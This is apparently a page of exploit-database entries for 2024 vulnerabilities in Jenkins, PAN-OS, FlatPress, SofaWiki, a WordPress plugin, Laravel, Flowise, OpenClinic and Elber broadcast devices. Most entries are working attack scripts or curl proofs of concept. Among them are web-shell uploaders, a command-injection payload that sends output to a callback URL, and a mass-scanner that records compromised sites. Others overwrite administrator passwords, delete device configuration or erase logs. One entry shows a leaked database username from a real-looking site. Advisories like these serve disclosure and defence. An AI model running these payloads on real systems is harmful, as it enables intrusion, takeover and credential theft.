All posts published by ISHACK AI BOT
-
Jenkins 2.441 - Local File Inclusion
# Exploit Title: Jenkins 2.441 - Local File Inclusion
# Date: 14/04/2024
# Exploit Author: Matisse Beckandt (Backendt)
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip
# Version: 2.441
# Tested on: Debian 12 (Bookworm)
# CVE: CVE-2024-23897

from argparse import ArgumentParser
from requests import Session, post, exceptions
from threading import Thread
from uuid import uuid4
from time import sleep
from re import findall


class Exploit(Thread):
    def __init__(self, url: str, identifier: str):
        Thread.__init__(self)
        self.daemon = True
        self.url = url
        self.params = {"remoting": "false"}
        self.identifier = identifier
        self.stop_thread = False
        self.listen = False

    def run(self):
        while not self.stop_thread:
            if self.listen:
                self.listen_and_print()

    def stop(self):
        self.stop_thread = True

    def receive_next_message(self):
        self.listen = True

    def wait_for_message(self):
        while self.listen:
            sleep(0.5)

    def print_formatted_output(self, output: str):
        if "ERROR: No such file" in output:
            print("File not found.")
        elif "ERROR: Failed to parse" in output:
            print("Could not read file.")
        expression = "No such agent \"(.*)\" exists."
        results = findall(expression, output)
        print("\n".join(results))

    def listen_and_print(self):
        session = Session()
        headers = {"Side": "download", "Session": self.identifier}
        try:
            response = session.post(self.url, params=self.params, headers=headers)
        except (exceptions.ConnectTimeout, exceptions.ConnectionError):
            print("Could not connect to target to setup the listener.")
            exit(1)
        self.print_formatted_output(response.text)
        self.listen = False

    def send_file_request(self, filepath: str):
        headers = {"Side": "upload", "Session": self.identifier}
        payload = get_payload(filepath)
        try:
            post(self.url, data=payload, params=self.params, headers=headers, timeout=4)
        except (exceptions.ConnectTimeout, exceptions.ConnectionError):
            print("Could not connect to the target to send the request.")
            exit(1)

    def read_file(self, filepath: str):
        self.receive_next_message()
        sleep(0.1)
        self.send_file_request(filepath)
        self.wait_for_message()


def get_payload_message(operation_index: int, text: str) -> bytes:
    text_bytes = bytes(text, "utf-8")
    text_size = len(text_bytes)
    text_message = text_size.to_bytes(2) + text_bytes
    message_size = len(text_message)
    payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_message
    return payload


def get_payload(filepath: str) -> bytes:
    arg_operation = 0
    start_operation = 3
    command = get_payload_message(arg_operation, "connect-node")
    poisoned_argument = get_payload_message(arg_operation, f"@{filepath}")
    payload = command + poisoned_argument + start_operation.to_bytes(1)
    return payload


def start_interactive_file_read(exploit: Exploit):
    print("Press Ctrl+C to exit")
    while True:
        filepath = input("File to download:\n> ")
        filepath = make_path_absolute(filepath)
        exploit.receive_next_message()
        try:
            exploit.read_file(filepath)
        except exceptions.ReadTimeout:
            print("Payload request timed out.")


def make_path_absolute(filepath: str) -> str:
    if not filepath.startswith('/'):
        return f"/proc/self/cwd/{filepath}"
    return filepath


def format_target_url(url: str) -> str:
    if url.endswith('/'):
        url = url[:-1]
    return f"{url}/cli"


def get_arguments():
    parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897")
    parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/")
    parser.add_argument("-p", "--path", help="The absolute path of the file to download")
    return parser.parse_args()


def main():
    args = get_arguments()
    url = format_target_url(args.url)
    filepath = args.path
    identifier = str(uuid4())
    exploit = Exploit(url, identifier)
    exploit.start()

    if filepath:
        filepath = make_path_absolute(filepath)
        exploit.read_file(filepath)
        exploit.stop()
        return

    try:
        start_interactive_file_read(exploit)
    except KeyboardInterrupt:
        pass
    print("\nQuitting")
    exploit.stop()


if __name__ == "__main__":
    main()
-
OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
# Date: 2023-08-14
# Exploit Author: V. B.
# Vendor Homepage: https://sourceforge.net/projects/open-clinic/
# Software Link: https://sourceforge.net/projects/open-clinic/
# Version: OpenClinic GA 5.247.01
# Tested on: Windows 10, Windows 11
# CVE: CVE-2023-40279

# Details

An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.

# Proof of Concept (POC)

Steps to Reproduce:

1. Crafting the Malicious GET Request:
   - Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
   - Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):

     GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
     Host: 192.168.100.5:10088
     Accept-Encoding: gzip, deflate
     Accept: */*
     Accept-Language: en-US;q=0.9,en;q=0.8
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
     Connection: close
     Cookie: JSESSIONID=[SESSION ID]
     Cache-Control: max-age=0

2. Confirming the Vulnerability:
   - Send the crafted GET request to the target server.
   - If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.
   - This vulnerability can lead to sensitive information disclosure or more severe attacks.
-
Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation
# Exploit Title: Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation
# Date: 21 Apr 2024
# Exploit Author: Kr0ff
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400
# Software Link: -
# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3
#          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1
#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1
# Tested on: Debian
# CVE : CVE-2024-3400

#!/usr/bin/env python3

import sys

try:
    import argparse
    import requests
except ImportError:
    print("Missing dependencies, either requests or argparse not installed")
    sys.exit(2)

# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
# https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/


def check_vuln(target: str, file: str) -> bool:
    ret = False
    uri = "/ssl-vpn/hipreport.esp"
    s = requests.Session()
    r = ""

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36",  # Windows 10 Chrome 118.0.0.0
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
    }

    headers_noCookie = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"  # Windows 10 Chrome 118.0.0.0
    }

    if not "http://" or not "https://" in target:
        target = "http://" + target

    try:
        r = s.post((target + uri), verify=False, headers=headers, timeout=10)
    except requests.exceptions.Timeout or requests.ConnectionError as e:
        print(f"Request timed out for \"HTTP\" !{e}")
        print("Trying with \"HTTPS\"...")
        target = "https://" + target
        try:
            r = s.post((target + uri), verify=False, headers=headers, timeout=10)
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTPS\"")
            sys.exit(1)
    else:
        r = s.post((target + uri), verify=False, headers=headers, timeout=10)

    if r.status_code == 200:
        r = s.get((target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10)
        if r.status_code == 403:
            print("Target vulnerable to CVE-2024-3400")
            ret = True
    else:
        return ret

    return ret


def cmdexec(target: str, callback_url: str, payload: str) -> bool:
    ret = False
    p = ""
    if " " in payload:
        p = payload.replace(" ", "${IFS)")

    uri = "/ssl-vpn/hipreport.esp"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36",  # Windows 10 Chrome 118.0.0.0
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"
    }

    s = requests.Session()
    r = ""

    if not "http://" or not "https://" in target:
        target = "http://" + target

    try:
        r = s.post((target + uri), verify=False, headers=headers, timeout=10)
    except requests.exceptions.Timeout or requests.ConnectionError as e:
        print(f"Request timed out for \"HTTP\" !{e}")
        print("Trying with \"HTTPS\"...")
        target = "https://" + target
        try:
            r = s.post((target + uri), verify=False, headers=headers, timeout=10)
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTPS\"")
            sys.exit(1)
    else:
        r = s.post((target + uri), verify=False, headers=headers, timeout=10)

    if not "Success" in r.text:
        return ret
    else:
        ret = True

    return ret


# Initilize parser for arguments
def argparser(selection=None):
    parser = argparse.ArgumentParser(description='CVE-2024-3400 - Palo Alto OS Command Injection')
    subparser = parser.add_subparsers(help="Available modules", dest="module")

    exploit_subp = subparser.add_parser("exploit", help="Exploit module of script")
    exploit_subp.add_argument("-t", "--target", help="Target to send payload to", required=True)
    exploit_subp.add_argument("-p", "--payload", help="Payload to send (e.g: whoami)", required=True)
    exploit_subp.add_argument("-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True)

    # ---------------------------------------

    check_subp = subparser.add_parser("check", help="Vulnerability check module of script")
    check_subp.add_argument("-t", "--target", help="Target to check if vulnerable", required=True)
    check_subp.add_argument("-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True)

    args = parser.parse_args(selection)
    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])

    if args.module == "exploit":
        cmdexec(args.target, args.callbackurl, args.payload)
    if args.module == "check":
        check_vuln(args.target, args.filename)


if __name__ == "__main__":
    argparser()
    print("Finished !")
-
FlatPress v1.3 - Remote Command Execution
# Exploit Title: FlatPress v1.3 - Remote Command Execution
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 19.04.2024
# Vendor Homepage: https://www.flatpress.org
# Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip
# Tested Version: 1.3 (latest)
# Tested on: MacOS

import requests
import time
import random
import string


def random_string(length=5):
    """Generates a random string."""
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(length))


def login_and_upload(base_url, username, password):
    filename = random_string() + ".php"
    login_url = f"http://{base_url}/login.php"
    upload_url = f"http://{base_url}/admin.php?p=uploader&action=default"

    with requests.Session() as session:
        # Exploiting
        print("Exploiting...")
        time.sleep(1)

        # Login attempt
        login_data = {
            'user': username,
            'pass': password,
            'submit': 'Login'
        }
        print("Logging in...")
        response = session.post(login_url, data=login_data)
        time.sleep(1)

        if "Logout" in response.text:
            print("Login Successful!")
        else:
            print("Login Failed!")
            print(response.text)
            return

        # File upload attempt
        print("Shell uploading...")
        time.sleep(1)

        # Form data and files
        files = {
            'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),
        }
        form_data = {
            '_wpnonce': '9e0ed04260',
            '_wp_http_referer': '/admin.php?p=uploader',
            'upload': 'Upload'
        }
        response = session.post(upload_url, files=files, data=form_data)

        if "File(s) uploaded" in response.text or "Upload" in response.text:
            shell_url = f"http://{base_url}/fp-content/attachs/(unknown)"
            print(f"Your Shell is Ready: {shell_url}")
            time.sleep(1)
            print(f"Shell Usage: {shell_url}?0=command")
        else:
            print("Exploit Failed!")
            print(response.status_code, response.text)


# Example usage: python script.py siteadi.com username password
if __name__ == "__main__":
    import sys
    if len(sys.argv) != 4:
        print("Usage: script.py <base_url> <username> <password>")
    else:
        base_url, username, password = sys.argv[1:]
        login_and_upload(base_url, username, password)
-
Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
# Date: 2024-04-16
# Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/background-image-cropper/
# Version: 1.2
# Category : webapps
# Tested on: windows 10 , firefox

import sys , requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)

shell = """<?php
echo "Ex3ptionaL";
echo "<br>".php_uname()."<br>";
echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>";
if($_POST['upload']) {
    if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) {
        echo "eXploiting Done";
    } else {
        echo "Failed to Upload.";
    }
}
?>"""

requests.urllib3.disable_warnings()
headers = {
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
    'referer': 'www.google.com'
}

try:
    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
    path = str(sys.argv[0]).split('\\')
    exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')


def URLdomain(site):
    if site.startswith("http://"):
        site = site.replace("http://", "")
    elif site.startswith("https://"):
        site = site.replace("https://", "")
    else:
        pass
    pattern = re.compile('(.*)/')
    while re.findall(pattern, site):
        sitez = re.findall(pattern, site)
        site = sitez[0]
    return site


def FourHundredThree(url):
    try:
        url = 'http://' + URLdomain(url)
        check = requests.get(url + '/wp-content/plugins/background-image-cropper/ups.php', headers=headers, allow_redirects=True, timeout=15)
        if 'enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload' in check.content:
            print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
            open('Shells.txt', 'a').write(url + '/wp-content/plugins/background-image-cropper/ups.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url + '/wp-content/plugins/background-image-cropper/ups.php', headers=headers, allow_redirects=True, verify=False, timeout=15)
            if 'enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload' in check.content:
                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                open('Shells.txt', 'a').write(url + '/wp-content/plugins/background-image-cropper/ups.php\n')
            else:
                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
    except:
        print ' -| ' + url + ' --> {}[Failed]'.format(fr)


mp = Pool(150)
mp.map(FourHundredThree, target)
mp.close()
mp.join()
print '\n [!] {}Saved in LOL.txt'.format(fc)
-
SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated)
# Exploit Title: SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 18.04.2024
# Vendor Homepage: https://www.sofawiki.com
# Software Link: https://www.sofawiki.com/site/files/snapshot.zip
# Tested Version: v3.9.2 (latest)
# Tested on: MacOS

import requests
import random
import sys
import time


def main():
    if len(sys.argv) < 4:
        print("Usage: python exploit.py <base_url> <username> <password>")
        sys.exit(1)

    base_url, username, password = sys.argv[1:4]
    filename = f"{random.randint(10000, 99999)}.phtml"

    session = requests.Session()
    login_url = f"{base_url}/index.php"
    login_data = {
        "submitlogin": "Login",
        "username": username,
        "pass": password,
        "name": "SofaWiki",
        "action": "login"
    }

    print("Exploiting...")
    time.sleep(1)
    response = session.post(login_url, data=login_data)
    if "Logout" not in response.text:
        print("Login failed:", response.text)
        sys.exit()
    print("Login Successful")
    time.sleep(1)

    php_shell_code = """
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
    system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
"""

    print("Shell uploading...")
    time.sleep(1)
    upload_url = f"{base_url}/index.php"
    files = {
        "uploadedfile": (filename, php_shell_code, "text/php"),
        "action": (None, "uploadfile"),
        "MAX_FILE_SIZE": (None, "8000000"),
        "filename": (None, filename),
        "content": (None, "content")
    }
    response = session.post(upload_url, files=files)
    if response.status_code == 200:
        print(f"Your shell is ready: {base_url}/site/files/(unknown)")
    else:
        print("Upload failed:", response.text)


if __name__ == "__main__":
    main()
-
Laravel Framework 11 - Credential Leakage
# Exploit Title: Laravel Framework 11 - Credential Leakage
# Google Dork: N/A
# Date: [2024-04-19]
# Exploit Author: Huseein Amer
# Vendor Homepage: [https://laravel.com/]
# Software Link: N/A
# Version: 8.* - 11.* (REQUIRED)
# Tested on: [N/A]
# CVE : CVE-2024-29291

Proof of concept:

Go to any Laravel-based website and navigate to storage/logs/laravel.log. Open the file and search for "PDO->__construct('mysql:host=". The result:

#0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', '[password redacted]', Array)
#1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', '[password redacted]', Array)

Credentials:
Username: u429384055_jscv
Password: [password redacted]
Host: sql1...
-
Flowise 1.6.5 - Authentication Bypass
# Exploit Title: Flowise 1.6.5 - Authentication Bypass
# Date: 17-April-2024
# Exploit Author: Maerifat Majeed
# Vendor Homepage: https://flowiseai.com/
# Software Link: https://github.com/FlowiseAI/Flowise/releases
# Version: 1.6.5
# Tested on: mac-os
# CVE : CVE-2024-31621

Flowise version <= 1.6.5 is vulnerable to an authentication bypass. The code snippet

this.app.use((req, res, next) => {
    if (req.url.includes('/api/v1/')) {
        whitelistURLs.some((url) => req.url.includes(url)) ? next() : basicAuthMiddleware(req, res, next)
    } else next()
})

puts the authentication middleware in front of every endpoint under /api/v1 except a few whitelisted ones. But the check is case-sensitive: it only matches the lowercase string /api/v1. Anyone rewriting the path in uppercase, such as /API/V1, bypasses the authentication because the substring test fails and the request falls through to next().

POC:

curl http://localhost:3000/Api/v1/credentials

For a seamless bypass, use the Burp Suite "Match and replace" rules in the proxy settings. Add the rule: Request first line, api/v1 ==> API/V1
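As an added example (not Flowise's own code, and not its patch), the gate from the snippet above is reproduced as a pure function beside a hardened variant that normalises the path before an exact prefix test, so both can be exercised without a server; `whitelistURLs` is a constructed sample list and the normalisation approach is an assumption, not the project's fix.

```javascript
// Constructed sample whitelist; the real list lives in Flowise's config.
const whitelistURLs = ['/api/v1/verify/apikey/', '/api/v1/chatflows-streaming'];

// Vulnerable gate, mirroring the advisory's middleware: a case-sensitive
// substring test on the raw request URL. Returns true when basic auth
// should be enforced, false when the request is let through.
function requiresAuthVulnerable(url) {
  if (url.includes('/api/v1/')) {
    return !whitelistURLs.some((w) => url.includes(w));
  }
  return false;
}

// Hardened gate (assumed fix): decide on a canonical path, not the raw URL.
function normalisePath(url) {
  const raw = url.startsWith('/') ? url : '/' + url;
  // URL parsing drops the query/fragment and resolves "." and ".." segments;
  // a fixed dummy origin keeps "//host-like" input from being read as a host.
  const { pathname } = new URL('http://localhost' + raw);
  let path = pathname.replace(/\/+/g, '/');
  // Decode percent-encoded octets so "%41pi" is seen as "Api"; on malformed
  // input keep the undecoded path, which then simply fails the prefix test.
  try {
    path = decodeURIComponent(path);
  } catch (e) {
    // keep path as is
  }
  return path.toLowerCase();
}

function requiresAuthHardened(url) {
  const path = normalisePath(url);
  if (path !== '/api/v1' && !path.startsWith('/api/v1/')) return false;
  // Whitelist entries are matched as normalised prefixes, not substrings, so a
  // whitelisted string hidden in the query cannot switch the auth off.
  return !whitelistURLs.some((w) => path.startsWith(normalisePath(w)));
}

// Side-by-side view of the two gates on a few constructed request lines.
function compareGates() {
  const samples = [
    '/api/v1/credentials',
    '/Api/v1/credentials',
    '/API/V1/credentials',
    '/api/v1/../v1/credentials',
    '/api/v1/credentials?x=/api/v1/verify/apikey/',
    '/api/v1/verify/apikey/abc',
  ];
  return samples.map((u) => ({
    url: u,
    vulnerable: requiresAuthVulnerable(u),
    hardened: requiresAuthHardened(u),
  }));
}
```

In `compareGates()` the second, third, fourth and fifth rows show `vulnerable: false` with `hardened: true`; those are exactly the requests the original middleware lets through unauthenticated.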
-
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass

Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.999 Revision 1243
                  1.317 Revision 602
                  1.220 Revision 1250
                  1.220 Revision 1248_1249
                  1.220 Revision 597
                  1.217 Revision 1242
                  1.214 Revision 1023
                  1.193 Revision 924
                  1.175 Revision 873
                  1.166 Revision 550

Summary: The SIGNUM controller from Elber satellite equipment demodulates one or two DVB-S/S2 signals up to 32APSK (single/multi-stream), achieving 256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned and configured in 1+1 seamless switching for redundancy. Redundancy can also be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II audio codec, providing analog and digital outputs; moreover, it's possible to set a data PID to be decoded and passed to the internal RDS encoder, generating the dual MPX FM output.

Desc: The device suffers from an authentication bypass vulnerability through direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint, which lets them overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application, compromising the device's system security.

--------------------------------------------------------------------------
/modules/pwd.html (lines 50-59)
------------------

function apply_pwd(level, pwd)
{
  $.get("json_data/set_pwd", {lev:level, pass:pwd},
  function(data){
    //$.alert({title:'Operation',text:data});
    show_message(data);
  }).fail(function(error){
    show_message('Error ' + error.status, 'error');
  });
}
--------------------------------------------------------------------------

Tested on: NBFM Controller embOS/IP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2024-5814
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5814.php

18.08.2023

--

$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234

Ref (lev param):
Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)
-
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Device Config

Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.999 Revision 1243
                  1.317 Revision 602
                  1.220 Revision 1250
                  1.220 Revision 1248_1249
                  1.220 Revision 597
                  1.217 Revision 1242
                  1.214 Revision 1023
                  1.193 Revision 924
                  1.175 Revision 873
                  1.166 Revision 550

Summary: The SIGNUM controller from Elber satellite equipment demodulates one or two DVB-S/S2 signals up to 32APSK (single/multi-stream), achieving 256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned and configured in 1+1 seamless switching for redundancy. Redundancy can also be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II audio codec, providing analog and digital outputs; moreover, it's possible to set a data PID to be decoded and passed to the internal RDS encoder, generating the dual MPX FM output.

Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure.

Tested on: NBFM Controller embOS/IP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2024-5815
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5815.php

18.08.2023

--

# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased

# Until:
# =0   ALL
# =-2  Yesterday
# =-8  Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()

# Etc.
-
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass

Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.0.0 Revision 7304
                  1.0.0 Revision 7284
                  1.0.0 Revision 6505
                  1.0.0 Revision 6332
                  1.0.0 Revision 6258
                  XS2DAB v1.50 rev 6267

Summary: Cleber offers a powerful, flexible and modular hardware and software platform for broadcasting and contribution networks where customers can install up to six boards with no limitations in terms of position or number. Based on a Linux embedded OS, it detects the presence of the boards and shows the related control interface to the user, either through web GUI and Touchscreen TFT display. Power supply can be single (AC and/or DC) or dual (hot swappable for redundancy); customers may choose between two ranges for DC sources, that is 22-65 or 10-36 Vdc for site or DSNG applications.

Desc: The device suffers from an authentication bypass vulnerability through direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint, which lets them overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application, compromising the device's system security.

--------------------------------------------------------------------------
/modules/pwd.html (lines 50-59)
------------------

function apply_pwd(level, pwd)
{
  $.get("json_data/set_pwd", {lev:level, pass:pwd},
  function(data){
    //$.alert({title:'Operation',text:data});
    show_message(data);
  }).fail(function(error){
    show_message('Error ' + error.status, 'error');
  });
}
--------------------------------------------------------------------------

Tested on: NBFM Controller embOS/IP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2024-5816
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5816.php

18.08.2023

--

$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234

Ref (lev param):
Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)
-
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Device Config Disclosure
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Device Config

Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.0.0 Revision 7304
                  1.0.0 Revision 7284
                  1.0.0 Revision 6505
                  1.0.0 Revision 6332
                  1.0.0 Revision 6258
                  XS2DAB v1.50 rev 6267

Summary: Cleber offers a powerful, flexible and modular hardware and software platform for broadcasting and contribution networks where customers can install up to six boards with no limitations in terms of position or number. Based on a Linux embedded OS, it detects the presence of the boards and shows the related control interface to the user, either through web GUI and Touchscreen TFT display. Power supply can be single (AC and/or DC) or dual (hot swappable for redundancy); customers may choose between two ranges for DC sources, that is 22-65 or 10-36 Vdc for site or DSNG applications.

Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure.

Tested on: NBFM Controller embOS/IP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2024-5817
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5817.php

18.08.2023

--

# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased

# Until:
# =0   ALL
# =-2  Yesterday
# =-8  Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
